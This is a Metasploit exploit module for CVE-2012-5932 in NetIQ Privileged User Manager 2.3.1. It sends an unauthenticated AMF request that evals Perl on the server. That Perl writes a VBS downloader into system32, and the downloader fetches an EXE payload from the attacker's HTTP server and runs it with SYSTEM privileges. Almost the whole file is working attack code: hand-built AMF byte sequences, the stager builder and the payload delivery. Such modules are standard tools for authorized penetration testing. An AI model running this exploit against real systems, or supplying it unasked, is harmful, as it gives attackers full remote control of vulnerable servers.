Path: blob/master/modules/exploits/windows/novell/netiq_pum_eval.rb
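##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# NetIQ Privileged User Manager 2.3.1 - Perl eval through the ldapagnt module
# without authorization (CVE-2012-5932).
#
# Flow, as implemented below:
#   1. POST an AMF "login" with bogus credentials. The error reply is used to
#      fingerprint the service (check) and, in exploit, to recover the service
#      name ("svc...") that the eval request has to echo back.
#   2. Start the HttpServer mixin over plain HTTP, hosting the payload EXE.
#   3. POST an AMF callModuleA -> ldapagnt -> Eval request whose "content" is
#      Perl. The Perl runs system("echo ...") to write a VBS stager into
#      %WINDIR%\system32, then runs it; the stager downloads and runs the EXE.
#   4. Wait up to HTTP_DELAY seconds for the target to fetch the EXE, then give
#      the payload time to run. Dropped files are removed by on_new_session.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution',
        'Description' => %q{
          This module abuses a lack of authorization in the NetIQ Privileged User Manager
          service (unifid.exe) to execute arbitrary perl code. The problem exists in the
          ldapagnt module. The module has been tested successfully on NetIQ PUM 2.3.1 over
          Windows 2003 SP2, which allows to execute arbitrary code with SYSTEM privileges.
        },
        'Author' => [
          'rgod', # Vulnerability discovery and PoC
          'juan vazquez' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2012-5932' ],
          [ 'OSVDB', '87334' ],
          [ 'BID', '56539' ],
          [ 'EDB', '22738' ]
        ],
        'Payload' => {
          'Space' => 2048,
          'StackAdjustment' => -3500
        },
        'Platform' => 'win',
        'Privileged' => true,
        'Targets' => [
          ['Windows 2003 SP2 / NetIQ Privileged User Manager 2.3.1', {}],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2012-11-15',
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_fs_delete_file
              stdapi_sys_config_getenv
            ]
          }
        },
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60])
      ]
    )

    # FileDropper: have on_new_session remove the files registered for cleanup.
    self.needs_cleanup = true
  end

  # Fingerprints the service from the reply to the fake login.
  #
  # An onResult carrying "Invalid user name or password" means the PUM service
  # answered (Detected); the same body also naming 2.3.1 means the tested
  # version (Appears). No reply, or anything else, is Safe.
  def check
    print_status("Sending fake login request...")
    res = send_amf_request(fake_login)

    return Exploit::CheckCode::Safe unless res

    body = res.body.to_s
    unless body =~ /onResult/ && body =~ /Invalid user name or password/
      return Exploit::CheckCode::Safe
    end

    return Exploit::CheckCode::Appears if body =~ /2\.3\.1/

    Exploit::CheckCode::Detected
  end

  # FileDropper hook: delete the VBS stager and the EXE that the Perl code wrote
  # under %WINDIR%\system32. Only a meterpreter session can do this (needs
  # getenv and fs.file.rm); for other session types the files stay registered.
  def on_new_session(session)
    if session.type == "meterpreter"
      session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
    end

    @dropped_files.delete_if do |file|
      next false unless session.type == "meterpreter"

      begin
        windir = session.sys.config.getenv('WINDIR')
        win_file = "#{windir}\\system32\\#{file.gsub("/", "\\\\")}"
        # Meterpreter should do this automatically as part of
        # fs.file.rm(). Until that has been implemented, remove the
        # read-only flag with a command.
        session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
        session.fs.file.rm(win_file)
        print_good("Deleted #{file}")
        true
      rescue ::Rex::Post::Meterpreter::RequestError
        false
      end
    end
  end

  # HttpServer callback: serve the generated EXE to whoever requests the
  # resource URI and record that the stager fetched it (@exe_sent is what the
  # wait loop in exploit polls).
  def on_request_uri(cli, request)
    vprint_status("on_request_uri called")

    unless @exe_data
      print_error("A request came in, but the EXE archive wasn't ready yet!")
      return
    end

    print_good("Sending the EXE payload to the target...")
    send_response(cli, @exe_data)
    @exe_sent = true
  end

  # Address the target is told to connect back to: SRVHOST as configured,
  # unless it is the 0.0.0.0 wildcard, in which case the local address that
  # would be used to reach an arbitrary remote host is taken instead.
  def lookup_lhost
    return datastore['SRVHOST'] unless datastore['SRVHOST'] == '0.0.0.0'

    Rex::Socket.source_address('50.50.50.50')
  end

  # Fixed AMF0 request body used by check and by the first step of exploit.
  # Decoded, it is SPF.Util.callModuleEx with one object argument:
  #   pkt => { Credentials => { name => "test", passwd => "test" },
  #            method => "login", module => "auth", uid => undefined }
  # The bogus credentials are rejected; the error reply is what the callers
  # inspect. Bytes are kept verbatim from the PoC.
  def fake_login
    data = "\x00\x00\x00\x00\x00\x01\x00\x15\x53\x50\x46\x2e\x55\x74" # ..........SPF.Ut
    data << "\x69\x6c\x2e\x63\x61\x6c\x6c\x4d\x6f\x64\x75\x6c\x65\x45\x78\x00" # il.callModuleEx.
    data << "\x02\x2f\x34\x00\x00\x00\x64\x0a\x00\x00\x00\x01\x03\x00\x03\x70" # ./4...d........p
    data << "\x6b\x74\x03\x00\x0b\x43\x72\x65\x64\x65\x6e\x74\x69\x61\x6c\x73" # kt...Credentials
    data << "\x03\x00\x04\x6e\x61\x6d\x65\x02\x00\x04\x74\x65\x73\x74\x00\x06" # ...name...test..
    data << "\x70\x61\x73\x73\x77\x64\x02\x00\x04\x74\x65\x73\x74\x00\x00\x09" # passwd...test...
    data << "\x00\x06\x6d\x65\x74\x68\x6f\x64\x02\x00\x05\x6c\x6f\x67\x69\x6e" # ..method...login
    data << "\x00\x06\x6d\x6f\x64\x75\x6c\x65\x02\x00\x04\x61\x75\x74\x68\x00" # ..module...auth.
    data << "\x03\x75\x69\x64\x06\x00\x00\x09\x00\x00\x09" # .uid.......
    data
  end

  def exploit
    print_status("Sending fake login request...")
    res = send_amf_request(fake_login)

    if res.nil? || res.code != 200 || res.body !~ /svc(.+)/
      fail_with(Failure::UnexpectedReply, 'Fake Login failed, svc not identified')
    end

    # Right after "svc" the reply carries the service name as a length-prefixed
    # string: one byte (presumably the AMF string marker) is skipped, the next
    # two are a 16-bit big-endian length, then the name itself. The eval
    # request must send this name back in its svc_name field.
    svc = Regexp.last_match(1)
    svc_length = svc[1, 2].unpack("n")[0]
    svc_name = svc[3, svc_length]
    vprint_status("SVC Found: #{svc_name}")

    print_status("Generating the EXE Payload...")
    @exe_data = generate_payload_exe
    @exe_sent = false
    exename = Rex::Text.rand_text_alpha(1 + rand(2))

    print_status("Setting up the Web Service...")
    resource_uri = "/#{exename}.exe"
    service_url = "http://#{lookup_lhost}:#{datastore['SRVPORT']}#{resource_uri}"
    print_status("Starting up our web service on #{service_url} ...")
    start_plain_http_service(resource_uri)

    # http://scriptjunkie1.wordpress.com/2010/09/27/command-stagers-in-windows/
    vbs_stage = Rex::Text.rand_text_alpha(3 + rand(5))
    code = build_perl_stager(vbs_stage, exename, service_url)
    # Relative names: on_new_session prefixes %WINDIR%\system32 when deleting.
    register_file_for_cleanup("#{vbs_stage}.vbs")
    register_file_for_cleanup("#{exename}.exe")

    print_status("Sending the eval code request...")
    res = send_amf_request(build_eval_request(code, svc_name))

    # When the Perl runs the service does not answer at all; getting a reply
    # means the eval request was not accepted.
    if res
      fail_with(Failure::UnexpectedReply, "There was an unexpected response to the code eval request")
    else
      print_good("There wasn't a response, but this is the expected behavior...")
    end

    print_status("Waiting for the victim to request the EXE payload...")
    waited = 0
    until @exe_sent
      Rex.sleep(1)
      waited += 1
      if waited > datastore['HTTP_DELAY']
        fail_with(Failure::TimeoutExpired, "Target didn't request the EXE payload -- Maybe it cant connect back to us?")
      end
    end

    print_status("Giving time to the payload to execute...")
    Rex.sleep(20)
  end

  # POSTs an AMF body to the service root with the headers every request in
  # this module uses. Returns the Rex response, or nil when nothing came back.
  def send_amf_request(data)
    send_request_cgi(
      'uri' => '/',
      'version' => '1.1',
      'method' => 'POST',
      'ctype' => "application/x-amf",
      'headers' => {
        "x-flash-version" => "11,4,402,278"
      },
      'data' => data
    )
  end

  # Starts the HttpServer mixin on resource_uri with SSL switched off, because
  # the VBS stager only speaks plain HTTP (service_url is built with http://).
  #
  # The datastore value is restored afterwards to whatever it was - not forced
  # to true as before - so a target reached over plain HTTP (SSL=false) is not
  # suddenly spoken to over TLS by the eval request that follows. The restore
  # is in an ensure so a failing start_service cannot leave SSL flipped.
  def start_plain_http_service(resource_uri)
    ssl_setting = datastore['SSL']
    datastore['SSL'] = false
    begin
      start_service({
        'Uri' => {
          'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) },
          'Path' => resource_uri
        }
      })
    ensure
      datastore['SSL'] = ssl_setting
    end
  end

  # Perl to be eval'd on the target. Each line of a VBS downloader is echoed
  # into %WINDIR%/system32/<vbs_stage>.vbs through system() (first line with
  # ">", the rest appending with ">>"), then the script is run. The VBS fetches
  # service_url with Microsoft.XMLHTTP, writes it to
  # %WINDIR%\system32\<exename>.exe via ADODB.Stream and runs it with
  # WScript.Shell. Quoting is already Perl-level escaped (\" inside system()).
  def build_perl_stager(vbs_stage, exename, service_url)
    vbs_path = "%WINDIR%/system32/#{vbs_stage}.vbs"
    exe_path = "%WINDIR%\\system32\\#{exename}.exe"

    vbs_lines = [
      "Set F=CreateObject(\\\"Microsoft.XMLHTTP\\\")",
      "F.Open \\\"GET\\\",\\\"#{service_url}\\\",False",
      "F.Send",
      "Set IA=CreateObject(\\\"ADODB.Stream\\\")",
      "IA.Type=1",
      "IA.Open",
      "IA.Write F.responseBody",
      "IA.SaveToFile \\\"#{exe_path}\\\",2",
      "CreateObject(\\\"WScript.Shell\\\").Run \\\"#{exe_path}\\\""
    ]

    code = String.new
    vbs_lines.each_with_index do |line, idx|
      redirect = idx.zero? ? '>' : '>>'
      code << "system(\"echo #{line} #{redirect}#{vbs_path}\");"
    end
    code << "system(\"#{vbs_stage}.vbs\");"
    code
  end

  # Length-prefixed AMF0 string payload: 16-bit big-endian byte length followed
  # by the bytes. The 0x02 "string" type marker is not included; callers emit
  # it where the field is a typed value (object keys carry no marker).
  def amf_utf8(str)
    [str.bytesize].pack("n") << str.b
  end

  # AMF0 body for SPF.Util.callModuleA with one object argument:
  #   pkt => { method => "eval", module => "ldapagnt",
  #            Eval => { content => <code> } },
  #   uid => "", svc_name => <svc_name>
  # Byte layout follows rgod's PoC. Note the "content" length is declared as
  # code length + 4 while 8 trailer bytes ("\n\n1;\n\n1;") follow it; this is
  # what the target accepts, so it is kept as-is.
  def build_eval_request(code, svc_name)
    identity = ""

    data = String.new
    data << "\x00\x00\x00\x00\x00\x01"             # AMF0, no headers, one message
    data << amf_utf8("SPF.Util.callModuleA")       # target URI
    data << "\x00\x00"                             # response URI (empty)
    data << "\x00"                                 # message body length (4 bytes) ...
    data << "\x00\x02"
    data << "\x0a\x0a"                             # ... and strict array marker
    data << "\x00\x00\x00\x01\x03"                 # one element: an object
    data << amf_utf8("pkt") << "\x03"              # pkt => {
    data << amf_utf8("method") << "\x02" << amf_utf8("eval")
    data << amf_utf8("module") << "\x02" << amf_utf8("ldapagnt")
    data << amf_utf8("Eval") << "\x03"             #   Eval => {
    data << amf_utf8("content") << "\x02"
    data << [code.bytesize + 4].pack("n")
    data << code
    data << "\x0a\x0a1;\x0a\x0a1;"
    data << "\x00\x00\x09"                         #   }
    data << "\x00\x00\x09"                         # }
    data << amf_utf8("uid") << "\x02" << amf_utf8(identity)
    data << "\x00\x00\x09"
    data << amf_utf8("svc_name") << "\x02" << amf_utf8(svc_name)
    data << "\x00\x00\x09"
    data
  end
end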